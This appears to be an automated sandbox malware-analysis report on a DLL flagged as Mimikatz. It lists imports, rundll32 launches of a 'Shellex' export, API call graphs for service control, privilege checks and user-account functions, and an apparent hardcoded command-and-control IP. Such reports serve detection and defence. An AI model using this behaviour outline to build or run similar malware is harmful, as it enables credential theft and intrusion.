                                                MSVCRT.dll_adjust_fdiv, _initterm, _onexit, __dllonexit, ??1type_info@@UAE@XZ, _snprintf, swprintf, _splitpath, strncpy, atol, strncat, realloc, fgets, srand, time, isdigit, _iob, _access, wcstombs, mbstowcs, _errno, _wcsupr, _strcmpi, _itoa, _strnicmp, fprintf, sscanf, getenv, vsprintf, exit, __CxxFrameHandler, memmove, ceil, _ftol, strstr, wcslen, wcscpy, sprintf, printf, fclose, fopen, remove, atoi, free, malloc, strncmp, _CIpow, floor, strchr, tolower, _CxxThrowException, _stricmp, _except_handler3, strrchr, _strlwr, wcsstr, rand, system
                                                MSVCP60.dll??0_Lockit@std@@QAE@XZ, ??1_Lockit@std@@QAE@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z, ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z, ?_Xlen@std@@YAXXZ, ?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z, ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z, ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z, ?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB, ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z, ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z, ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z, ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z, ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ, ?_Xran@std@@YAXXZ, ?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB, ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z, ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z, ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ, ??0Init@ios_base@std@@QAE@XZ, ??1Init@ios_base@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ, ??1_Winit@std@@QAE@XZ
                                                WINMM.dllmciSendStringA, waveInGetNumDevs
                                                WS2_32.dllgethostname, inet_addr, getsockname, bind, getpeername, accept, listen, sendto, recvfrom, ntohs, inet_ntoa, send, closesocket, recv, select, gethostbyname, connect, setsockopt, WSAIoctl, WSACleanup, WSAStartup, __WSAFDIsSet, ioctlsocket, socket, htons
                                                iphlpapi.dllGetIfTable
                                                dwmapi.dllDwmIsCompositionEnabled
                                                SHLWAPI.dllPathFindFileNameA, PathUnquoteSpacesA, PathRemoveArgsA, PathGetArgsA, SHDeleteKeyA
                                                WININET.dllInternetGetConnectedState, InternetReadFile, HttpSendRequestA, InternetOpenUrlA, HttpOpenRequestA, InternetOpenA, InternetConnectA, InternetCloseHandle, HttpQueryInfoA
                                                NETAPI32.dllNetUserSetInfo, NetUserAdd, NetUserGetLocalGroups, NetApiBufferFree, NetUserGetInfo, NetUserEnum, NetLocalGroupAddMembers, NetUserDel
                                                PSAPI.DLLGetProcessMemoryInfo, GetModuleFileNameExA
                                                WTSAPI32.dllWTSEnumerateSessionsA, WTSDisconnectSession, WTSLogoffSession, WTSQuerySessionInformationA, WTSFreeMemory, WTSQuerySessionInformationW
                                                NameOrdinalAddress
                                                Shellex10x1001efd0
                                                No network behavior found

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\loaddll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:loaddll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll"
                                                Imagebase:0xb90000
                                                File size:126'464 bytes
                                                MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:1
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:2
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:3
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,Shellex
                                                Imagebase:0x700000
                                                File size:61'440 bytes
                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:4
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
                                                Imagebase:0x700000
                                                File size:61'440 bytes
                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:5
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:13
                                                Start time:08:12:08
                                                Start date:18/11/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:1%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:50%
                                                  Total number of Nodes:244
                                                  Total number of Limit Nodes:11
                                                  execution_graph 21756 1001efd0 12 API calls 21837 1001b660 GetModuleHandleA 21756->21837 21758 1001f1d6 21759 1001b660 3 API calls 21758->21759 21760 1001f258 21759->21760 21761 1001b660 3 API calls 21760->21761 21762 1001f2c9 21761->21762 21763 1001b660 3 API calls 21762->21763 21764 1001f3ed 21763->21764 21765 1001b660 3 API calls 21764->21765 21766 1001f54e 21765->21766 21767 1001b660 3 API calls 21766->21767 21768 1001f67b 21767->21768 21769 1001b660 3 API calls 21768->21769 21770 1001f729 21769->21770 21771 1001b660 3 API calls 21770->21771 21772 1001f7c3 21771->21772 21773 1001b660 3 API calls 21772->21773 21774 1001f80d 21773->21774 21775 1001b660 3 API calls 21774->21775 21776 1001f893 21775->21776 21777 1001b660 3 API calls 21776->21777 21778 1001f93e GetCurrentThreadId PostThreadMessageA 21777->21778 21779 1001f959 InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 21778->21779 21781 1001fa63 21779->21781 21782 1001fa52 GetLastError 21779->21782 21784 1001fe86 21781->21784 21785 1001fadf 21781->21785 21782->21781 21783 1001fec6 21782->21783 21841 1001ab20 21784->21841 21786 1001fc40 21785->21786 21787 1001faeb strstr 21785->21787 21786->21783 21789 1001fc4c 21786->21789 21790 1001fb07 Sleep 21787->21790 21791 1001fb18 21787->21791 21856 1001e440 15 API calls 21789->21856 21800 1001ef90 24 API calls 21790->21800 21851 1001fee0 OpenSCManagerA OpenServiceA CloseServiceHandle CloseServiceHandle CloseServiceHandle 21791->21851 21792 1001fea1 21796 1001feb5 Sleep 21792->21796 21797 1001fea8 21792->21797 21848 1001ef90 21796->21848 21859 1001e440 15 API calls 21797->21859 21799 1001fc5f 21799->21783 21808 1001fc98 sprintf 21799->21808 21800->21790 21801 1001fb22 21805 1001fbb6 sprintf 21801->21805 21806 1001fb2d 21801->21806 21803 1001feb2 21803->21796 21853 1001e440 15 API calls 21805->21853 21811 1001fb52 OpenSCManagerA 21806->21811 21825 1001fba5 Sleep 21806->21825 21813 1001fd01 21808->21813 21809 1001fc15 21854 1001ff30 9 API calls 21809->21854 21815 1001fb65 OpenServiceA 21811->21815 21811->21825 21819 1001fd0a GetModuleFileNameA sprintf 21813->21819 21830 1001fe75 Sleep 21813->21830 21814 1001fc31 21855 1001ea60 9 API calls 21814->21855 21816 1001fba2 CloseServiceHandle 21815->21816 21817 1001fb7f StartServiceA 21815->21817 21816->21825 21822 1001fba0 CloseServiceHandle 21817->21822 21823 1001fb8d CloseServiceHandle CloseServiceHandle 21817->21823 21818 1001ef90 24 API calls 21818->21825 21828 1001fdbc Sleep 21819->21828 21821 1001fc39 ExitProcess 21822->21816 21852 1001ea60 9 API calls 21823->21852 21825->21818 21827 1001ef90 24 API calls 21827->21830 21831 1001fe12 21828->21831 21829 1001fb99 ExitProcess 21830->21827 21857 1001e800 GetModuleHandleA LoadLibraryA GetProcAddress CloseHandle 21831->21857 21833 1001fe2d sprintf 21834 1001fe69 21833->21834 21858 1001ea60 9 API calls 21834->21858 21836 1001fe6e ExitProcess 21838 1001b670 LoadLibraryA 21837->21838 21839 1001b67b GetProcAddress 21837->21839 21838->21839 21840 1001b689 21838->21840 21839->21758 21840->21758 21860 10014700 LoadLibraryA GetProcAddress #823 #823 RegOpenKeyExA 21841->21860 21843 1001abc8 lstrlenA 21844 1001ac37 lstrlenA 21843->21844 21845 1001abd6 CreateFileA 21843->21845 21844->21792 21846 1001ac30 CloseHandle 21845->21846 21847 1001ac17 GetFileSize ReadFile 21845->21847 21846->21844 21847->21846 21888 1002bdb0 LoadLibraryA GetProcAddress 21848->21888 21850 1001efa7 WaitForSingleObject CloseHandle 21850->21796 21851->21801 21852->21829 21853->21809 21854->21814 21855->21821 21856->21799 21857->21833 21858->21836 21859->21803 21861 10014881 21860->21861 21862 10014899 21860->21862 21886 10014c12 RegCloseKey RegCloseKey 21861->21886 21865 10014a03 RegQueryValueExA 21862->21865 21866 100148c2 RegQueryValueExA 21862->21866 21867 10014ba2 wsprintfA 21862->21867 21868 10014908 RegQueryValueExA 21862->21868 21869 10014acc RegEnumValueA 21862->21869 21870 10014bcf wsprintfA 21862->21870 21871 10014a30 RegEnumKeyExA 21862->21871 21872 10014bf5 lstrcatA 21862->21872 21873 10014b58 wsprintfA 21862->21873 21874 10014b7d wsprintfA 21862->21874 21875 100149bc RegQueryValueExA 21862->21875 21883 100148ac 21862->21883 21884 100148f2 21862->21884 21865->21884 21866->21884 21867->21872 21876 10014934 21868->21876 21868->21884 21880 10014b44 21869->21880 21869->21884 21870->21872 21879 10014a78 wsprintfA 21871->21879 21871->21884 21872->21843 21873->21872 21874->21872 21878 100149e8 wsprintfA 21875->21878 21875->21884 21876->21884 21885 1001494e strncat strncat strchr 21876->21885 21877 10014894 #825 #825 21877->21843 21878->21884 21879->21871 21880->21867 21880->21870 21880->21872 21880->21873 21880->21874 21883->21865 21883->21866 21883->21867 21883->21868 21883->21870 21883->21872 21883->21873 21883->21874 21883->21875 21883->21884 21887 10014c12 RegCloseKey RegCloseKey 21884->21887 21885->21876 21886->21877 21887->21877 21889 1002bdf3 CreateThread LoadLibraryA GetProcAddress 21888->21889 21890 1002be35 CloseHandle 21889->21890 21891 1002bcb0 21889->21891 21890->21850 21897 10010ca0 21891->21897 21893 1002bcee LoadLibraryA GetProcAddress 21894 1002bd5e 21893->21894 21895 1002bd69 21894->21895 21898 1002bfa0 14 API calls 21894->21898 21897->21893 21898->21895 21899 1002d2eb 21900 1002d2fe 21899->21900 21905 1002d307 21899->21905 21902 1002d32f 21900->21902 21914 100214b0 21900->21914 21901 1002d323 21928 1002d240 malloc _initterm free 21901->21928 21905->21900 21905->21901 21905->21902 21906 1002d32b 21906->21900 21908 1002d34f 21908->21902 21910 1002d358 21908->21910 21909 1002d347 21929 1002d240 malloc _initterm free 21909->21929 21930 1002d240 malloc _initterm free 21910->21930 21913 1002d360 21913->21902 21915 10021588 21914->21915 21916 100214be 21914->21916 21915->21902 21915->21908 21915->21909 21931 10021410 _access 21916->21931 21918 100214c3 _access 21919 100214e0 WinExec _access 21918->21919 21920 10021521 Sleep 21918->21920 21919->21920 21921 10021500 WinExec Sleep _access 21919->21921 21954 10020f70 21920->21954 21921->21920 21921->21921 21923 1002152d CreateThread 21924 10021551 CreateThread 21923->21924 21925 1002154e CloseHandle 21923->21925 22038 10020fd0 96 API calls 21923->22038 21926 10021566 CloseHandle 21924->21926 21927 10021569 Shellex 21924->21927 22037 100211c0 41 API calls 21924->22037 21925->21924 21926->21927 21927->21915 21928->21906 21929->21908 21930->21913 21932 10021434 21931->21932 21933 1002142b 21931->21933 21932->21918 21959 100209d0 AllocateAndInitializeSid 21933->21959 21936 1002143d GetModuleFileNameA 21936->21932 21937 10021453 21936->21937 21938 1002145b ShellExecuteExA 21937->21938 21939 10021497 GetLastError 21938->21939 21940 1002149f exit 21938->21940 21939->21938 21941 100214b0 21940->21941 21942 10021588 21941->21942 21943 10021410 123 API calls 21941->21943 21942->21918 21944 100214c3 _access 21943->21944 21945 100214e0 WinExec _access 21944->21945 21946 10021521 Sleep 21944->21946 21945->21946 21947 10021500 WinExec Sleep _access 21945->21947 21948 10020f70 8 API calls 21946->21948 21947->21946 21947->21947 21949 1002152d CreateThread 21948->21949 21950 10021551 CreateThread 21949->21950 21951 1002154e CloseHandle 21949->21951 21985 10020fd0 _access 21949->21985 21952 10021566 CloseHandle 21950->21952 21953 10021569 Shellex 21950->21953 21962 100211c0 _access 21950->21962 21951->21950 21952->21953 21953->21942 22034 10020f30 GetModuleFileNameA 21954->22034 21956 10020f7a 21957 10020f81 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@ 21956->21957 21958 10020f9f GetLastError ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@ 21956->21958 21957->21923 21958->21923 21960 10020a36 21959->21960 21961 10020a1a CheckTokenMembership FreeSid 21959->21961 21960->21932 21960->21936 21961->21960 21963 100212e1 Sleep CreateFileA 21962->21963 21964 100211f8 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 21962->21964 21965 10021310 MessageBoxA 21963->21965 21966 10021327 GetFileSize 21963->21966 21967 10021228 ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 21964->21967 21968 1002124c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 21964->21968 21969 100213f0 21965->21969 21970 10021335 MessageBoxA 21966->21970 21971 1002134e VirtualAlloc 21966->21971 21967->21968 22030 10020810 22 API calls 21968->22030 21973 100213e9 CloseHandle 21970->21973 21974 10021369 MessageBoxA 21971->21974 21975 1002137d ReadFile 21971->21975 21973->21969 21974->21973 21978 100213c7 MessageBoxA VirtualFree 21975->21978 21979 1002138e 21975->21979 21976 1002128d 21977 100212a5 21976->21977 21980 100212ab #825 21976->21980 21977->21963 21982 100212d8 #825 21977->21982 21984 100212d2 21977->21984 21978->21973 21979->21978 21981 10021393 CloseHandle 21979->21981 21980->21977 21983 100213a0 VirtualFree 21981->21983 21982->21963 21984->21963 21986 10021123 21985->21986 21987 10021009 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 21985->21987 21990 100209d0 3 API calls 21986->21990 21988 10021063 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 21987->21988 21989 1002103f ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 21987->21989 22031 10020810 22 API calls 21988->22031 21989->21988 21991 10021128 21990->21991 21993 1002114e GetModuleFileNameA 21991->21993 21994 1002112c 21991->21994 21997 10021163 21993->21997 21998 10021131 21993->21998 22032 10020c20 41 API calls 21994->22032 21995 100210b4 21999 100210d3 #825 21995->21999 22001 100210cd 21995->22001 22000 1002116e ShellExecuteExA 21997->22000 21999->22001 22003 100211a6 GetLastError 22000->22003 22004 100211ae exit 22000->22004 22002 10021118 Sleep 22001->22002 22005 1002110f #825 22001->22005 22007 10021109 22001->22007 22002->21986 22003->22000 22006 100211c0 _access 22004->22006 22005->22002 22008 100212e1 Sleep CreateFileA 22006->22008 22009 100211f8 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 22006->22009 22007->22002 22010 10021310 MessageBoxA 22008->22010 22011 10021327 GetFileSize 22008->22011 22012 10021228 ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 22009->22012 22013 1002124c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 22009->22013 22014 100213f0 22010->22014 22015 10021335 MessageBoxA 22011->22015 22016 1002134e VirtualAlloc 22011->22016 22012->22013 22033 10020810 22 API calls 22013->22033 22019 100213e9 CloseHandle 22015->22019 22020 10021369 MessageBoxA 22016->22020 22021 1002137d ReadFile 22016->22021 22018 1002128d 22024 100212ab #825 22018->22024 22027 100212a5 22018->22027 22019->22014 22020->22019 22022 100213c7 MessageBoxA VirtualFree 22021->22022 22023 1002138e 22021->22023 22022->22019 22023->22022 22025 10021393 CloseHandle 22023->22025 22024->22027 22028 100213a0 VirtualFree 22025->22028 22026 100212d8 #825 22026->22008 22027->22008 22027->22026 22029 100212d2 22027->22029 22029->22008 22030->21976 22031->21995 22032->21998 22033->22018 22035 10020f53 CopyFileA 22034->22035 22036 10020f4c 22034->22036 22035->21956 22036->21956

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 1001efd0-1001fa50 #823 lstrcpyA * 11 call 1001b660 * 11 GetCurrentThreadId PostThreadMessageA InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 25 1001fa63-1001faba 0->25 26 1001fa52-1001fa5d GetLastError 0->26 29 1001fad0-1001fad9 25->29 30 1001fabc-1001faca 25->30 26->25 27 1001fec6-1001fed2 26->27 31 1001fe86-1001fea6 call 1001ab20 29->31 32 1001fadf-1001fae5 29->32 30->29 43 1001feb5 31->43 44 1001fea8-1001feb2 call 1001e440 31->44 33 1001fc40-1001fc46 32->33 34 1001faeb-1001fb05 strstr 32->34 33->27 36 1001fc4c-1001fc92 call 1001e440 33->36 37 1001fb07 34->37 38 1001fb18-1001fb27 call 1001fee0 34->38 36->27 58 1001fc98-1001fd04 sprintf 36->58 41 1001fb0d-1001fb16 Sleep call 1001ef90 37->41 53 1001fbb6-1001fc3a sprintf call 1001e440 call 1001ff30 call 1001ea60 ExitProcess 38->53 54 1001fb2d-1001fb50 38->54 45 1001febb-1001febf Sleep call 1001ef90 43->45 44->43 55 1001fec4 45->55 62 1001fb52-1001fb63 OpenSCManagerA 54->62 63 1001fba5 54->63 55->45 71 1001fe75 58->71 72 1001fd0a-1001fe6f GetModuleFileNameA sprintf Sleep call 1001e800 sprintf call 1001ea60 ExitProcess 58->72 62->63 67 1001fb65-1001fb7d OpenServiceA 62->67 64 1001fbab-1001fbb4 Sleep call 1001ef90 63->64 68 1001fba2-1001fba3 CloseServiceHandle 67->68 69 1001fb7f-1001fb8b StartServiceA 67->69 68->63 75 1001fba0 CloseServiceHandle 69->75 76 1001fb8d-1001fb9a CloseServiceHandle * 2 call 1001ea60 ExitProcess 69->76 77 1001fe7b-1001fe84 Sleep call 1001ef90 71->77 75->68
                                                  APIs
                                                  • #823.MFC42(00000849), ref: 1001EFDF
                                                  • lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
                                                  • lstrcpyA.KERNEL32(1011EAFC,0000012C), ref: 1001F014
                                                  • lstrcpyA.KERNEL32(Default,00000260), ref: 1001F022
                                                  • lstrcpyA.KERNEL32(1.0,00000292), ref: 1001F030
                                                  • lstrcpyA.KERNEL32(1011EC82,000002B2), ref: 1001F03E
                                                  • lstrcpyA.KERNEL32(1011ECE6,00000316), ref: 1001F04C
                                                  • lstrcpyA.KERNEL32(1011ED66,00000396), ref: 1001F05A
                                                  • lstrcpyA.KERNEL32(1011EE66,00000496), ref: 1001F068
                                                  • lstrcpyA.KERNEL32(1011EF78,000005A8), ref: 1001F076
                                                  • lstrcpyA.KERNEL32(1011EFDC,0000060C), ref: 1001F084
                                                  • lstrcpyA.KERNEL32(1011F018,00000648), ref: 1001F092
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • GetCurrentThreadId.KERNEL32 ref: 1001F94E
                                                  • PostThreadMessageA.USER32(00000000,?,?,?,?,?,?), ref: 1001F955
                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?), ref: 1001F973
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?), ref: 1001F987
                                                  • GetCommandLineA.KERNEL32 ref: 1001F9B1
                                                  • CreateMutexA.KERNELBASE(?,00000000,00000000), ref: 1001FA43
                                                  • GetLastError.KERNEL32 ref: 1001FA52
                                                  • strstr.MSVCRT ref: 1001FAFA
                                                  • Sleep.KERNEL32(00000032,?,?,?,?,?,?,?,?), ref: 1001FB0F
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001FB59
                                                  • OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 1001FB6D
                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 1001FB82
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FB8F
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FB92
                                                  • ExitProcess.KERNEL32 ref: 1001FB9A
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FBA0
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FBA3
                                                  • ExitProcess.KERNEL32 ref: 1001FC3A
                                                  • sprintf.MSVCRT ref: 1001FC05
                                                    • Part of subcall function 1001E440: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
                                                    • Part of subcall function 1001E440: GetLocalTime.KERNEL32(?), ref: 1001E4CE
                                                    • Part of subcall function 1001E440: sprintf.MSVCRT ref: 1001E599
                                                  • Sleep.KERNEL32(00000032), ref: 1001FBAD
                                                    • Part of subcall function 1001EF90: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,75570F00,1001FEC4), ref: 1001EFAF
                                                    • Part of subcall function 1001EF90: CloseHandle.KERNEL32(00000000,?,?,?,?,?,75570F00,1001FEC4,?,?,?,?,?,?,?,?), ref: 1001EFB6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
